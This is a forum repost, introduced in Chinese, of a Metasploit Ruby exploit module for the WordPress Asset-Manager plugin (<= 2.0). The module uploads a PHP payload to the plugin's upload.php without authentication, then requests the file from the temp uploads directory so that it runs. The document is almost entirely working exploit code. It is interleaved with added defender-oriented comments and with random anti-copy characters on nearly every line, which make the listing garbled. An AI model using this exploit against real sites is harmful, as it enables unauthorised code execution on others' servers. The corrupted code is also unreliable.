这个模块是 Metasploit 漏洞利用框架中的一个模块，针对 WordPress Asset-Manager 插件 2.0 及以下版本中发现的漏洞。该漏洞允许上传 PHP 文件：用户无需身份验证即可将文件上传到一个临时目录，从而导致任意代码执行。
+ t* d' C! q6 k: M' z! q' [- \
7 x4 R- p' {& B##0 Y* x# z: `0 I7 L# t
# This file is part of the Metasploit Framework and may be subject to
& b" t' C6 K: u# redistribution and commercial restrictions. Please see the Metasploit
8 L3 t1 }3 a6 G6 r* ?# Framework web site for more information on licensing and terms of use.. |1 M( `% Q6 K" i! P: ~7 I O
# http://metasploit.com/framework/# z8 k) k7 ~$ }9 u9 k& M4 m) h
##
$ v" W6 D' j) U0 o " r5 }4 W9 H7 d$ a
require 'msf/core'
) [) I% c+ M2 m9 l, b. p8 wrequire 'msf/core/exploit/php_exe'
6 u; _/ f- _* G8 y 0 X, U: T5 R5 K& ?
# Metasploit exploit module for the unauthenticated file-upload flaw in the
# WordPress Asset-Manager plugin (<= 2.0 per the Description below).
# The listing is a forum paste with anti-copy noise interleaved; the comments
# added here describe what the visible code does and what a defender can
# observe from it. Class body: metadata (initialize) and the request flow
# (exploit).
class Metasploit3 < Msf::Exploit::Remote9 ]' w9 s" I! j) ^
Rank = ExcellentRanking
@ U R, c" p ; f' x- @/ I3 E* y7 |
include Msf::Exploit::Remote::HttpClient
: j1 }* f/ f. P+ j include Msf::Exploit: hpEXE
4 t% l- ], A. c' g( n* A5 {4 @& r 8 P3 ^! [: o6 U$ P! n# w
# Module metadata: name, description, authors, references (OSVDB 82653,
# BID 53809, EDB 18993), payload constraints and targets. The only option the
# module registers is TARGETURI, defaulting to '/wordpress'.
def initialize(info = {})0 H) u9 k# }" e( a* t
super(update_info(info,
# H4 Y& y8 g2 q: g. I9 z% K4 J 'Name' => 'WordPress Asset-Manager PHP File Upload Vulnerability',2 q8 p+ x2 [0 F+ s+ l( n4 I7 t
'Description' => %q{ ` G) n' |4 [0 F. P+ P
This module exploits a vulnerability found in Asset-Manager <= 2.0 WordPress
; l4 U# z$ y. I: j+ D8 G plugin. By abusing the upload.php file, a malicious user can upload a file to a# q5 h6 c+ G; J4 q+ S5 P) y3 R
temp directory without authentication, which results in arbitrary code execution.
. K$ A/ L5 i% D, K },
4 u# D) |3 T- A" h 'Author' =>6 H) }: W3 l+ R: R; ]+ K8 F
[/ o3 ~- w/ g% ^% ?% J; J
'Sammy FORGIT', # initial discovery- ^ B7 J9 D# F# p
'James Fitts <fitts.james[at]gmail.com>' # metasploit module# R/ k- J0 \6 n" p J
],
' w5 l' y) E. r$ ^$ T. k 'License' => MSF_LICENSE,
. j3 I) n3 s6 I0 C. } 'References' =>
0 D& l1 S) r! E* {1 X5 v7 j [2 {9 u+ O2 O9 m
[ 'OSVDB', '82653' ],
( y/ S! ]7 L. I* `5 R7 Q" a [ 'BID', '53809' ],# ]. B N' }# @ s- y
[ 'EDB', '18993' ],1 X: _# I3 ^5 ~0 ^+ M' h# d) j
[ 'URL', 'http:// www.myhack58.com /' ]+ m: J& M6 _/ E4 ~- a. S; }: K
],0 P/ Q6 n* a! a9 g7 [' n* Q
'Payload' =>
: A7 i+ t& q$ v; u {
& C; e% h2 H5 ]9 s# T/ K' J. B2 V 'BadChars' => "\x00",
% n) e( e2 t$ a; h },, l4 I! i9 `9 V+ A7 I( f
'Platform' => 'php',
9 X C3 z% o0 ?8 _" [ 'Arch' => ARCH_PHP,, w' L3 I2 }( k w" j; y+ \, T) h
'Targets' =>
9 S! N8 g7 J: d# o9 a [
- W% b5 s( m$ V5 _' G* E: I, ` [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],# R% r8 n. s' F! o+ c, g
[ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ]
5 {. {' n# o4 J/ V1 p E ],
6 V& a5 s1 _* y& R 'DefaultTarget' => 0,- P0 Y( R3 i8 Z1 a7 R5 R: l" w# }" I
'DisclosureDate' => 'May 26 2012'))
& ]" u8 b# D9 w5 a
# TARGETURI is the WordPress base path; the plugin and upload paths used in
# exploit are appended to it.
& W# V. p e: W+ K: w7 ^ register_options(" v8 r/ u* ^) j5 Y& N) A
[% B- |" C7 F, V: A
OptString.new('TARGETURI', [true, 'The full URI path to WordPress', '/wordpress'])
9 `: `7 \; p1 f5 @2 @1 b6 o ], self.class)
0 ?/ J+ x6 X9 N* \% Q& d end
. I$ n; A2 T' ~% X7 r
# Request flow as written below:
#   1. POST a multipart/form-data body (field name "Filedata") to
#      <TARGETURI>/wp-content/plugins/asset-manager/upload.php
#   2. GET <TARGETURI>/wp-content/uploads/assets/temp/<5 random letters>.php
# From a defender's side, the observable signature is an unauthenticated POST
# to the plugin's upload.php followed by a GET of a freshly created .php file
# under wp-content/uploads/assets/temp; serving PHP out of the uploads tree is
# what turns the upload into code execution, and the module's success check
# relies on the upload response echoing the filename back.
% f1 `3 b3 o' ^5 L% ^) b6 a2 w def exploit5 H) v& }+ |! Y0 O
uri = target_uri.path
# Ensure a trailing '/' so the relative plugin/upload paths concatenate cleanly.
/ ]! t& \, R) j" Y3 O% ^; c( x uri << '/' if uri[-1,1] != '/'
( g8 L6 f, o# W, G9 Q% W- R peer = "#{rhost}:#{rport}") g5 ]: b! ~, R
# Random 5-letter basename with a .php extension; the same name is used for
# the upload and for the follow-up GET, so log correlation is straightforward.
payload_name = "#{rand_text_alpha(5)}.php", J3 o3 h. h1 k. G0 f9_7 B
# Stager comes from the PhpEXE mixin (outside this file); :unlink_self => true
# presumably asks it to remove its own file after running — confirm in the mixin.
php_payload = get_write_exec_payload(:unlink_self=>true); M% {! b6 k2 i# i9 E0 c
# Build the multipart body by hand: one part, content-disposition form-data,
# field "Filedata", filename set to payload_name.
: s5 V& [) | S) Z) L' D2 r data = Rex::MIME::Message.new
$ g7 X& Z1 j* F8 d0 k% { data.add_part(php_payload, "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"#{payload_name}\"")' y$ l3 g5 {! }3 n( N0 j; h
# Strip the leading CRLF that Rex::MIME::Message emits before the first
# boundary so the body starts directly with "--_Part_".
post_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')
, {/ h3 w8 Z* l- o8 `9 t 9 F: P9 x" m; ~; o. |- f
print_status("#{peer} - Uploading payload #{payload_name}")/ K/ a% Z- {& f' B+ O( g
# Step 1: unauthenticated POST to the plugin's upload handler; the boundary in
# the Content-Type header must match the one used by the Rex::MIME message.
res = send_request_cgi({" f6 M5 E5 E# x4 k" T* J4 D
'method' => 'POST',
, d( a+ i- v2 N6 G* d( X" ? 'uri' => "#{uri}wp-content/plugins/asset-manager/upload.php",
$ R4 \9 m9 y+ @: x 'ctype' => "multipart/form-data; boundary=#{data.bound}",; s9 H$ ?: Q8 v$ g
'data' => post_data2 q2 |/ p7 K5 L/ i1 d
})
2 f, W- g" W0 x0 k. |9 p5 R+ I, F } / e4 g) y; u9 ]* Y9 T
# Upload is considered successful only when the server answers 200 and the
# response body contains the random filename (the plugin echoes it back).
if not res or res.code != 200 or res.body !~ /#{payload_name}/) u8 p" C+ k" G2 N6 g
fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Upload failed")
% z8 I7 n8 R" [+ p0 \end6 ? G/ B+ G- e/ @: h
^# k7 e! n5 l print_status("#{peer} - Executing payload #{payload_name}")
# Step 2: request the uploaded file so the web server executes it.
! J1 n7 A' ?1 g4 c+ j0 M8 x res = send_request_raw({
; t- @" H: P( J 'uri' => "#{uri}wp-content/uploads/assets/temp/#{payload_name}",! B/ H, n5 s9 J" h
'method' => 'GET'
$ h! Y& j6 V; o2 |# D' v8 @$ ` })
5 k- p0 D! m7 } n+ s: g# `! ^
# NOTE(review): a nil response here is not treated as a failure — only a
# non-200 response triggers fail_with, so a dropped connection on this second
# request is reported as success by the module.
! E6 D; `# J3 @; M* d( c7 E if res and res.code != 200( x% |5 K# q) M1 \3 m9 G1 k& g
fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Execution failed")
7 l+ M' ?0 M3 `/ H end5 w# Y* z2 U3 C& Z) M
end' z0 D1 V' ~4 |" Q: S
end$ g% Y7 a) G% \( u
|